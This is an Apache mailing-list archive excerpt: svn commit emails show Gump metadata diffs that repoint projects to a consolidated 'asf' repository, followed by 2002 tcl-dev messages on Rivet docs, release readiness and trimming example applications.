http://svn.apache.org/viewvc/gump/metadata/project/xml-fop-maintenance.xml?rev=748685&r1=748684&r2=748685&view=diff ============================================================================== --- gump/metadata/project/xml-fop-maintenance.xml (original) +++ gump/metadata/project/xml-fop-maintenance.xml Fri Feb 27 20:29:17 2009 @@ -22,7 +22,7 @@ XSL-FO (Formatting Objects) processor (Maintenance branch) </description> - <svn repository="xmlgraphics" dir="fop/branches/fop-0_20_2-maintain/"/> + <svn repository="asf" dir="xmlgraphics/fop/branches/fop-0_20_2-maintain/"/> <!-- main project --> Modified: gump/metadata/project/xml-fop.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/xml-fop.xml?rev=748685&r1=748684&r2=748685&view=diff ============================================================================== --- gump/metadata/project/xml-fop.xml (original) +++ gump/metadata/project/xml-fop.xml Fri Feb 27 20:29:17 2009 @@ -22,7 +22,7 @@ XSL-FO (Formatting Objects) processor </description> - <svn repository="xmlgraphics" dir="fop/trunk/"/> + <svn repository="asf" dir="xmlgraphics/fop/trunk/"/> <!-- main project --> Modified: gump/metadata/project/xml-security.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/xml-security.xml?rev=748685&r1=748684&r2=748685&view=diff ============================================================================== --- gump/metadata/project/xml-security.xml (original) +++ gump/metadata/project/xml-security.xml Fri Feb 27 20:29:17 2009 @@ -22,7 +22,7 @@ XML-Signature Syntax and Processing </description> - <svn repository="xml-svn" dir="security/trunk"/> + <svn repository="asf" dir="xml/security/trunk"/> <!-- build --> Modified: gump/metadata/project/xml-site.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/xml-site.xml?rev=748685&r1=748684&r2=748685&view=diff ============================================================================== --- gump/metadata/project/xml-site.xml (original) +++ gump/metadata/project/xml-site.xml Fri Feb 27 20:29:17 2009 @@ -21,7 +21,7 @@ The XML site </description> - <svn repository="xml-svn" dir="site"/> + <svn repository="asf" dir="xml/site"/> <project name="xml-site"/> </module> Modified: gump/metadata/project/xml-stylebook.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/xml-stylebook.xml?rev=748685&r1=748684&r2=748685&view=diff ============================================================================== --- gump/metadata/project/xml-stylebook.xml (original) +++ gump/metadata/project/xml-stylebook.xml Fri Feb 27 20:29:17 2009 @@ -21,7 +21,7 @@ Style book </description> - <svn repository="xml-svn" dir="stylebook/trunk"/> + <svn repository="asf" dir="xml/stylebook/trunk"/> <project name="xml-stylebook2"> <package>org.apache.stylebook</package> Modified: gump/metadata/project/xml-xindice.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/xml-xindice.xml?rev=748685&r1=748684&r2=748685&view=diff ============================================================================== --- gump/metadata/project/xml-xindice.xml (original) +++ gump/metadata/project/xml-xindice.xml Fri Feb 27 20:29:17 2009 @@ -22,7 +22,7 @@ native XML database </description> - <svn repository="xml-svn" dir="xindice/trunk"/> + <svn repository="asf" dir="xml/xindice/trunk"/> <project name="xml-xindice"> <package>org.apache.xindice</package> Modified: gump/metadata/project/xml-xmlbeans.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/xml-xmlbeans.xml?rev=748685&r1=748684&r2=748685&view=diff ============================================================================== --- gump/metadata/project/xml-xmlbeans.xml (original) +++ gump/metadata/project/xml-xmlbeans.xml Fri Feb 27 20:29:17 2009 @@ -21,7 +21,7 @@ XML Beans Object &lt;-&gt; Java Binding Tool </description> - <svn repository="xmlbeans" dir="branches/1.x"/> + <svn repository="asf" dir="xmlbeans/branches/1.x"/> <project name="xml-xmlbeans-v1"> <ant buildfile="build.xml" target="bootstrap"/> Modified: gump/metadata/project/xmlgraphics-commons.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/xmlgraphics-commons.xml?rev=748685&r1=748684&r2=748685&view=diff ============================================================================== --- gump/metadata/project/xmlgraphics-commons.xml (original) +++ gump/metadata/project/xmlgraphics-commons.xml Fri Feb 27 20:29:17 2009 @@ -23,7 +23,7 @@ Apache XML Graphics Commons - Common Components for Batik and FOP </description> - <svn repository="xmlgraphics" dir="commons/trunk/"/> + <svn repository="asf" dir="xmlgraphics/commons/trunk/"/> <!-- main project --> Modified: gump/metadata/testbase/profile.xml URL: http://svn.apache.org/viewvc/gump/metadata/testbase/profile.xml?rev=748685&r1=748684&r2=748685&view=diff ============================================================================== --- gump/metadata/testbase/profile.xml (original) +++ gump/metadata/testbase/profile.xml Fri Feb 27 20:29:17 2009 @@ -32,14 +32,12 @@ <module href="testbase/xml-xerces2.xml"/> <module href="testbase/junit.xml"/> - <repository href="repository/apr.xml"/> <repository href="repository/asf.xml"/> <repository href="repository/excalibur-svn.xml"/> <repository href="repository/jakarta-svn.xml"/> <repository href="repository/junit.xml"/> <repository href="repository/logging.xml"/> <repository href="repository/sourceforge.xml"/> - <repository href="repository/xml-svn.xml"/> <project name="jaxp" package="jaxp-1_3"/> <project name="junitperf" package="junitperf-1.8"/> From [email protected] Sat Feb 28 06:36:16 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 70934 invoked from network); 28 Feb 2009 06:36:15 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Feb 2009 06:36:15 -0000 Received: (qmail 17531 invoked by uid 500); 28 Feb 2009 06:36:15 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 17522 invoked by uid 99); 28 Feb 2009 06:36:15 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 27 Feb 2009 22:36:15 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 28 Feb 2009 06:36:08 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 478F123888A3; Sat, 28 Feb 2009 06:35:48 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r748781 - in /gump/metadata: profile/ project/ repository/ testbase/ Date: Sat, 28 Feb 2009 06:35:47 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Sat Feb 28 06:35:45 2009 New Revision: 748781 URL: http://svn.apache.org/viewvc?rev=748781&view=rev Log: more repository consolidation Removed: gump/metadata/profile/demo.xml gump/metadata/profile/gump-n.xml gump/metadata/project/xml-crimson.xml gump/metadata/repository/excalibur-svn.xml gump/metadata/repository/jakarta-svn.xml gump/metadata/repository/logging.xml Modified: gump/metadata/profile/gump.xml gump/metadata/project/excalibur.xml gump/metadata/project/jakarta-bcel.xml gump/metadata/project/jakarta-bsf.xml gump/metadata/project/jakarta-cactus.xml gump/metadata/project/jakarta-ecs.xml gump/metadata/project/jakarta-jmeter-22.xml gump/metadata/project/jakarta-jmeter.xml gump/metadata/project/jakarta-oro.xml gump/metadata/project/jakarta-regexp.xml gump/metadata/project/jakarta-site2.xml gump/metadata/project/jakarta-slide.xml gump/metadata/project/jakarta-taglibs-sandbox.xml gump/metadata/project/jakarta-taglibs.xml gump/metadata/project/jakarta-turbine-jcs.xml gump/metadata/project/logging-chainsaw.xml gump/metadata/project/logging-log4cxx.xml gump/metadata/project/logging-log4j-12.xml gump/metadata/project/logging-log4j-component.xml gump/metadata/project/logging-log4j-extras.xml gump/metadata/project/logging-log4j-receivers.xml gump/metadata/project/logging-log4j-zeroconf.xml gump/metadata/project/logging-log4net.xml gump/metadata/testbase/profile.xml Modified: gump/metadata/profile/gump.xml URL: http://svn.apache.org/viewvc/gump/metadata/profile/gump.xml?rev=748781&r1=748780&r2=748781&view=diff ============================================================================== --- gump/metadata/profile/gump.xml (original) +++ gump/metadata/profile/gump.xml Sat Feb 28 06:35:45 2009 @@ -637,7 +637,6 @@ <repository href="repository/db-svn.xml"/> <repository href="repository/dbxml.xml"/> <repository href="repository/directory.xml"/> - <repository href="repository/excalibur-svn.xml"/> <repository href="repository/forrest.xml"/> <repository href="repository/ggf-cddlm.xml"/> <repository href="repository/gump.xml"/> @@ -645,14 +644,12 @@ <repository href="repository/httpcomponents.xml"/> <repository href="repository/ikayzo.xml"/> <repository href="repository/jacorb.xml"/> - <repository href="repository/jakarta-svn.xml"/> <repository href="repository/james.xml"/> <repository href="repository/javanet.xml"/> <repository href="repository/jboss.xml"/> <repository href="repository/jdom.xml"/> <repository href="repository/junit.xml"/> <repository href="repository/lenya.xml"/> - <repository href="repository/logging.xml"/> <repository href="repository/lucene.xml"/> <repository href="repository/maven.xml"/> <repository href="repository/mina.xml"/> Modified: gump/metadata/project/excalibur.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/excalibur.xml?rev=748781&r1=748780&r2=748781&view=diff ============================================================================== --- gump/metadata/project/excalibur.xml (original) +++ gump/metadata/project/excalibur.xml Sat Feb 28 06:35:45 2009 @@ -23,7 +23,7 @@ Repository of reusable components. </description> - <svn repository="excalibur-svn" dir="trunk"/> + <svn repository="asf" dir="excalibur/trunk"/> <project name="excalibur-component"> Modified: gump/metadata/project/jakarta-bcel.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/jakarta-bcel.xml?rev=748781&r1=748780&r2=748781&view=diff ============================================================================== --- gump/metadata/project/jakarta-bcel.xml (original) +++ gump/metadata/project/jakarta-bcel.xml Sat Feb 28 06:35:45 2009 @@ -22,7 +22,7 @@ Byte Code Engineering Library </description> - <svn repository="jakarta-svn" dir="bcel/trunk"/> + <svn repository="asf" dir="jakarta/bcel/trunk"/> <project name="bcel"> <package>org.apache.bcel</package> Modified: gump/metadata/project/jakarta-bsf.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/jakarta-bsf.xml?rev=748781&r1=748780&r2=748781&view=diff ============================================================================== --- gump/metadata/project/jakarta-bsf.xml (original) +++ gump/metadata/project/jakarta-bsf.xml Sat Feb 28 06:35:45 2009 @@ -22,7 +22,7 @@ Bean Scripting Framework </description> - <svn repository="jakarta-svn" dir="bsf/trunk"/> + <svn repository="asf" dir="jakarta/bsf/trunk"/> <project name="jakarta-bsf"> <package>org.apache.bsf</package> Modified: gump/metadata/project/jakarta-cactus.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/jakarta-cactus.xml?rev=748781&r1=748780&r2=748781&view=diff ============================================================================== --- gump/metadata/project/jakarta-cactus.xml (original) +++ gump/metadata/project/jakarta-cactus.xml Sat Feb 28 06:35:45 2009 @@ -26,7 +26,7 @@ <redistributable/> - <svn repository="jakarta-svn" dir="cactus/trunk"/> + <svn repository="asf" dir="jakarta/cactus/trunk"/> <!-- ======================================================================== Modified: gump/metadata/project/jakarta-ecs.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/jakarta-ecs.xml?rev=748781&r1=748780&r2=748781&view=diff ============================================================================== --- gump/metadata/project/jakarta-ecs.xml (original) +++ gump/metadata/project/jakarta-ecs.xml Sat Feb 28 06:35:45 2009 @@ -22,7 +22,7 @@ Element Construction Set </description> - <svn repository="jakarta-svn" dir="ecs/trunk"/> + <svn repository="asf" dir="jakarta/ecs/trunk"/> <project name="jakarta-ecs"> <package>org.apache.ecs</package> Modified: gump/metadata/project/jakarta-jmeter-22.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/jakarta-jmeter-22.xml?rev=748781&r1=748780&r2=748781&view=diff ============================================================================== --- gump/metadata/project/jakarta-jmeter-22.xml (original) +++ gump/metadata/project/jakarta-jmeter-22.xml Sat Feb 28 06:35:45 2009 @@ -23,7 +23,7 @@ Release branch 2-2 </description> - <svn repository="jakarta-svn" dir="jmeter/branches/rel-2-2"/> + <svn repository="asf" dir="jakarta/jmeter/branches/rel-2-2"/> <project name="jakarta-jmeter-22-svn"> <!-- Build JMeter from CVS versions of dependencies --> Modified: gump/metadata/project/jakarta-jmeter.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/jakarta-jmeter.xml?rev=748781&r1=748780&r2=748781&view=diff ============================================================================== --- gump/metadata/project/jakarta-jmeter.xml (original) +++ gump/metadata/project/jakarta-jmeter.xml Sat Feb 28 06:35:45 2009 @@ -23,7 +23,7 @@ Trunk build </description> - <svn repository="jakarta-svn" dir="jmeter/trunk"/> + <svn repository="asf" dir="jakarta/jmeter/trunk"/> <project name="jakarta-jmeter-svn"> <!-- Build JMeter from latest versions of dependencies --> Modified: gump/metadata/project/jakarta-oro.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/jakarta-oro.xml?rev=748781&r1=748780&r2=748781&view=diff ============================================================================== --- gump/metadata/project/jakarta-oro.xml (original) +++ gump/metadata/project/jakarta-oro.xml Sat Feb 28 06:35:45 2009 @@ -22,7 +22,7 @@ Java Regular Expression package </description> - <svn repository="jakarta-svn" dir="oro/trunk"/> + <svn repository="asf" dir="jakarta/oro/trunk"/> <project name="jakarta-oro"> <package>org.apache.oro</package> Modified: gump/metadata/project/jakarta-regexp.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/jakarta-regexp.xml?rev=748781&r1=748780&r2=748781&view=diff ============================================================================== --- gump/metadata/project/jakarta-regexp.xml (original) +++ gump/metadata/project/jakarta-regexp.xml Sat Feb 28 06:35:45 2009 @@ -22,7 +22,7 @@ Java Regular Expression package </description> - <svn repository="jakarta-svn" dir="regexp/trunk"/> + <svn repository="asf" dir="jakarta/regexp/trunk"/> <project name="jakarta-regexp"> <package>org.apache.regexp</package> Modified: gump/metadata/project/jakarta-site2.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/jakarta-site2.xml?rev=748781&r1=748780&r2=748781&view=diff ============================================================================== --- gump/metadata/project/jakarta-site2.xml (original) +++ gump/metadata/project/jakarta-site2.xml Sat Feb 28 06:35:45 2009 @@ -22,7 +22,7 @@ The Jakarta site </description> - <svn repository="jakarta-svn" dir="site"/> + <svn repository="asf" dir="jakarta/site"/> <project name="jakarta-site2"> <ant> Modified: gump/metadata/project/jakarta-slide.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/jakarta-slide.xml?rev=748781&r1=748780&r2=748781&view=diff ============================================================================== --- gump/metadata/project/jakarta-slide.xml (original) +++ gump/metadata/project/jakarta-slide.xml Sat Feb 28 06:35:45 2009 @@ -22,7 +22,7 @@ Content Management System based on WebDAV technology </description> - <svn repository="jakarta-svn" dir="slide/trunk" /> + <svn repository="asf" dir="jakarta/slide/trunk" /> <!-- Slide has been retired in November 2007, but there are some projects still depending on the webdavclient --> Modified: gump/metadata/project/jakarta-taglibs-sandbox.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/jakarta-taglibs-sandbox.xml?rev=748781&r1=748780&r2=748781&view=diff ============================================================================== --- gump/metadata/project/jakarta-taglibs-sandbox.xml (original) +++ gump/metadata/project/jakarta-taglibs-sandbox.xml Sat Feb 28 06:35:45 2009 @@ -22,7 +22,7 @@ JSP Taglibs </description> - <svn repository="jakarta-svn" dir="taglibs/trunks-sandbox"/> + <svn repository="asf" dir="jakarta/taglibs/trunks-sandbox"/> <!-- Tag Libraries --> Modified: gump/metadata/project/jakarta-taglibs.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/jakarta-taglibs.xml?rev=748781&r1=748780&r2=748781&view=diff ============================================================================== --- gump/metadata/project/jakarta-taglibs.xml (original) +++ gump/metadata/project/jakarta-taglibs.xml Sat Feb 28 06:35:45 2009 @@ -22,7 +22,7 @@ JSP Taglibs </description> - <svn repository="jakarta-svn" dir="taglibs/trunks-proper"/> + <svn repository="asf" dir="jakarta/taglibs/trunks-proper"/> <!-- Parent POM --> <project name="jakarta-taglibs-parent"> Modified: gump/metadata/project/jakarta-turbine-jcs.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/jakarta-turbine-jcs.xml?rev=748781&r1=748780&r2=748781&view=diff ============================================================================== --- gump/metadata/project/jakarta-turbine-jcs.xml (original) +++ gump/metadata/project/jakarta-turbine-jcs.xml Sat Feb 28 06:35:45 2009 @@ -21,7 +21,7 @@ <description>Cache</description> <url href="http://jakarta.apache.org/turbine/jcs/"/> - <svn repository="jakarta-svn" dir="jcs/trunk"/> + <svn repository="asf" dir="jakarta/jcs/trunk"/> <!-- This is really the cvs module. We need to change this but --> <!-- I will leave this for now until everything works. --> Modified: gump/metadata/project/logging-chainsaw.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/logging-chainsaw.xml?rev=748781&r1=748780&r2=748781&view=diff ============================================================================== --- gump/metadata/project/logging-chainsaw.xml (original) +++ gump/metadata/project/logging-chainsaw.xml Sat Feb 28 06:35:45 2009 @@ -22,7 +22,7 @@ Chainsaw log viewer </description> - <svn repository="logging" dir="chainsaw/trunk"/> + <svn repository="asf" dir="logging/chainsaw/trunk"/> <project name="logging-log4j-chainsaw"> <package>org.apache.log4j.chainsaw</package> Modified: gump/metadata/project/logging-log4cxx.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/logging-log4cxx.xml?rev=748781&r1=748780&r2=748781&view=diff ============================================================================== --- gump/metadata/project/logging-log4cxx.xml (original) +++ gump/metadata/project/logging-log4cxx.xml Sat Feb 28 06:35:45 2009 @@ -23,7 +23,7 @@ Apache log4cxx </description> - <svn repository="logging" dir="log4cxx/trunk"/> + <svn repository="asf" dir="logging/log4cxx/trunk"/> <project name="logging-log4cxx-ant"> Modified: gump/metadata/project/logging-log4j-12.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/logging-log4j-12.xml?rev=748781&r1=748780&r2=748781&view=diff ============================================================================== --- gump/metadata/project/logging-log4j-12.xml (original) +++ gump/metadata/project/logging-log4j-12.xml Sat Feb 28 06:35:45 2009 @@ -22,7 +22,7 @@ Fast and flexible logging package for Java </description> - <svn repository="logging" dir="log4j/trunk"/> + <svn repository="asf" dir="logging/log4j/trunk"/> <project name="logging-log4j-12"> <package>org.apache.log4j</package> Modified: gump/metadata/project/logging-log4j-component.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/logging-log4j-component.xml?rev=748781&r1=748780&r2=748781&view=diff ============================================================================== --- gump/metadata/project/logging-log4j-component.xml (original) +++ gump/metadata/project/logging-log4j-component.xml Sat Feb 28 06:35:45 2009 @@ -22,7 +22,7 @@ Back-port of log4j 1.3 component framework for use with log4j 1.2. </description> - <svn repository="logging" dir="log4j/companions/component/trunk"/> + <svn repository="asf" dir="logging/log4j/companions/component/trunk"/> <project name="logging-log4j-component"> <package>org.apache.log4j</package> Modified: gump/metadata/project/logging-log4j-extras.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/logging-log4j-extras.xml?rev=748781&r1=748780&r2=748781&view=diff ============================================================================== --- gump/metadata/project/logging-log4j-extras.xml (original) +++ gump/metadata/project/logging-log4j-extras.xml Sat Feb 28 06:35:45 2009 @@ -22,7 +22,7 @@ Back-ports of log4j 1.3 features and other enhancements for log4j 1.2. </description> - <svn repository="logging" dir="log4j/companions/extras/trunk"/> + <svn repository="asf" dir="logging/log4j/companions/extras/trunk"/> <project name="logging-log4j-extras"> <package>org.apache.log4j</package> Modified: gump/metadata/project/logging-log4j-receivers.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/logging-log4j-receivers.xml?rev=748781&r1=748780&r2=748781&view=diff ============================================================================== --- gump/metadata/project/logging-log4j-receivers.xml (original) +++ gump/metadata/project/logging-log4j-receivers.xml Sat Feb 28 06:35:45 2009 @@ -22,7 +22,7 @@ Back-port of log4j 1.3 receivers for use with log4j 1.2. </description> - <svn repository="logging" dir="log4j/companions/receivers/trunk"/> + <svn repository="asf" dir="logging/log4j/companions/receivers/trunk"/> <project name="logging-log4j-receivers"> <package>org.apache.log4j</package> Modified: gump/metadata/project/logging-log4j-zeroconf.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/logging-log4j-zeroconf.xml?rev=748781&r1=748780&r2=748781&view=diff ============================================================================== --- gump/metadata/project/logging-log4j-zeroconf.xml (original) +++ gump/metadata/project/logging-log4j-zeroconf.xml Sat Feb 28 06:35:45 2009 @@ -21,7 +21,7 @@ <description> Zeroconf extension to log4j </description> - <svn repository="logging" dir="log4j/companions/zeroconf/trunk"/> + <svn repository="asf" dir="logging/log4j/companions/zeroconf/trunk"/> <project name="logging-log4j-zeroconf"> <package>org.apache.log4j.net</package> Modified: gump/metadata/project/logging-log4net.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/logging-log4net.xml?rev=748781&r1=748780&r2=748781&view=diff ============================================================================== --- gump/metadata/project/logging-log4net.xml (original) +++ gump/metadata/project/logging-log4net.xml Sat Feb 28 06:35:45 2009 @@ -23,7 +23,7 @@ </description> <redistributable/> - <svn repository="logging" dir="log4net/trunk"/> + <svn repository="asf" dir="logging/log4net/trunk"/> <project name="logging-log4net" language="csharp"> <nant buildfile="log4net.build"/> Modified: gump/metadata/testbase/profile.xml URL: http://svn.apache.org/viewvc/gump/metadata/testbase/profile.xml?rev=748781&r1=748780&r2=748781&view=diff ============================================================================== --- gump/metadata/testbase/profile.xml (original) +++ gump/metadata/testbase/profile.xml Sat Feb 28 06:35:45 2009 @@ -33,10 +33,7 @@ <module href="testbase/junit.xml"/> <repository href="repository/asf.xml"/> - <repository href="repository/excalibur-svn.xml"/> - <repository href="repository/jakarta-svn.xml"/> <repository href="repository/junit.xml"/> - <repository href="repository/logging.xml"/> <repository href="repository/sourceforge.xml"/> <project name="jaxp" package="jaxp-1_3"/>
From [email protected] Mon Jun 10 09:59:21 2002 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 68376 invoked by uid 500); 10 Jun 2002 09:59:21 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk X-No-Archive: yes List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 68365 invoked from network); 10 Jun 2002 09:59:21 -0000 To: [email protected] Subject: docs From: [email protected] (David N. Welton) Date: 10 Jun 2002 12:03:02 +0200 Message-ID: <[email protected]> Lines: 19 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/20.7 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Over the weekend, I fiddled around a bit with some XSL stuff, and I've finally got some results that are beginning to look like something attractive to look at. A little bit of color goes a long way... I would invite you also to look at tcl-rivet/doc/packages/dio/dio.xml as an example of my current ideas with regards to the 'correct' DocBook to use with a Tcl package. (By the way, Damon chose 'dio' as the package name, not me:-) -- David N. Welton Consulting: http://www.dedasys.com/ Personal: http://www.dedasys.com/davidw/ Free Software: http://www.dedasys.com/freesoftware/ Apache Tcl: http://tcl.apache.org/ --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Jun 17 16:07:58 2002 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 24795 invoked by uid 500); 17 Jun 2002 16:07:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk X-No-Archive: yes List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 24784 invoked from network); 17 Jun 2002 16:07:57 -0000 To: [email protected] Subject: remaing things From: [email protected] (David N. Welton) Date: 17 Jun 2002 18:11:40 +0200 Message-ID: <[email protected]> Lines: 39 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/20.7 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N I set up the makefiles so that they can roll us a release. What else? We have INSTALL and README files. The docs are incomplete, but I think a significant effort is necessary to really fill them out. I haven't had any comments on the new look and feel, which I think is better, but might still be improved... The examples. Hrm... there are some that look a bit odd to me. I think a bit of triage would be worthwhile here. Which are your favorites? Least favorites? drwxrwsr-x 13 davidw davidw 4096 Jun 16 21:40 . drwxrwsr-x 6 davidw davidw 4096 Jun 16 21:40 .. drwxrwsr-x 4 davidw davidw 4096 Jun 16 21:40 bugdb drwxrwsr-x 2 davidw davidw 4096 Jun 16 21:40 CVS drwxrwsr-x 4 davidw davidw 4096 Jun 16 21:40 dvd drwxrwsr-x 4 davidw davidw 4096 Jun 16 21:40 form drwxrwsr-x 4 davidw davidw 4096 Jun 16 21:40 memory drwxrwsr-x 5 davidw davidw 4096 Jun 16 21:40 rfc drwxrwsr-x 5 davidw davidw 4096 Jun 16 21:40 sdb drwxrwsr-x 5 davidw davidw 4096 Jun 16 21:40 shop drwxrwsr-x 4 davidw davidw 4096 Jun 16 21:40 simpsess drwxrwsr-x 4 davidw davidw 4096 Jun 16 21:40 terms drwxrwsr-x 5 davidw davidw 4096 Jun 16 21:40 webshinspect A lot of them seem to be using broken paths/other cruft... Let's pick a few to keep and dump the rest, bar a few very simple hello world type apps? Or maybe reorganize into demonstrations of feature categories? -- David N. Welton Consulting: http://www.dedasys.com/ Personal: http://www.dedasys.com/davidw/ Free Software: http://www.dedasys.com/freesoftware/ Apache Tcl: http://tcl.apache.org/ --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Jun 17 17:45:53 2002 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 24481 invoked by uid 500); 17 Jun 2002 17:45:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk X-No-Archive: yes List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 24462 invoked from network); 17 Jun 2002 17:45:52 -0000 Date: Mon, 17 Jun 2002 19:45:48 +0200 From: Ronnie Brunner <[email protected]> To: "David N. Welton" <[email protected]> Cc: [email protected] Subject: Re: remaing things Message-ID: <[email protected]> Reply-To: Ronnie Brunner <[email protected]> References: <[email protected]> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <[email protected]>; from [email protected] on Mon, Jun 17, 2002 at 06:11:40PM +0200 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N > The examples. Hrm... there are some that look a bit odd to me. I > think a bit of triage would be worthwhile here. why not just dump 'em all and concentrate on the online examples? -> Refer to the online examples in the documentation and that's it for the moment. Any that we really need in addition? Ronnie ------------------------------------------------------------------------ Ronnie Brunner [email protected] Netcetera AG, 8040 Zuerich phone +41 1 247 79 79 Fax: +41 1 247 70 75 --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jun 20 08:07:03 2002 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 42586 invoked by uid 500); 20 Jun 2002 08:07:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk X-No-Archive: yes List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 42571 invoked from network); 20 Jun 2002 08:07:02 -0000 To: Ronnie Brunner <[email protected]> Cc: [email protected] Subject: Re: remaing things References: <[email protected]> <[email protected]> From: [email protected] (David N. Welton) Date: 20 Jun 2002 10:10:44 +0200 Message-ID: <[email protected]> Lines: 18 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/20.7 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Ronnie Brunner <[email protected]> writes: > > The examples. Hrm... there are some that look a bit odd to me. I > > think a bit of triage would be worthwhile here. > why not just dump 'em all and concentrate on the online examples? -> > Refer to the online examples in the documentation and that's it for > the moment. Any that we really need in addition? Do you have a tarball of those? They weren't in the site materials I received. If not, no big deal, I can cut&paste them off the web. -- David N. Welton Consulting: http://www.dedasys.com/ Personal: http://www.dedasys.com/davidw/ Free Software: http://www.dedasys.com/freesoftware/ Apache Tcl: http://tcl.apache.org/ --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jun 20 08:21:06 2002 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 51995 invoked by uid 500); 20 Jun 2002 08:21:05 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk X-No-Archive: yes List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 51960 invoked from network); 20 Jun 2002 08:21:04 -0000 Date: Thu, 20 Jun 2002 10:21:14 +0200 From: Ronnie Brunner <[email protected]> To: "David N. Welton" <[email protected]> Cc: [email protected] Subject: Re: remaing things Message-ID: <[email protected]> Reply-To: Ronnie Brunner <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <[email protected]> User-Agent: Mutt/1.4i X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N > > > The examples. Hrm... there are some that look a bit odd to me. I > > > think a bit of triage would be worthwhile here. > > > why not just dump 'em all and concentrate on the online examples? -> > > Refer to the online examples in the documentation and that's it for > > the moment. Any that we really need in addition? > > Do you have a tarball of those? They weren't in the site materials I > received. If not, no big deal, I can cut&paste them off the web. Aren't they in CVS:/tcl-site/websh/*.sample ? 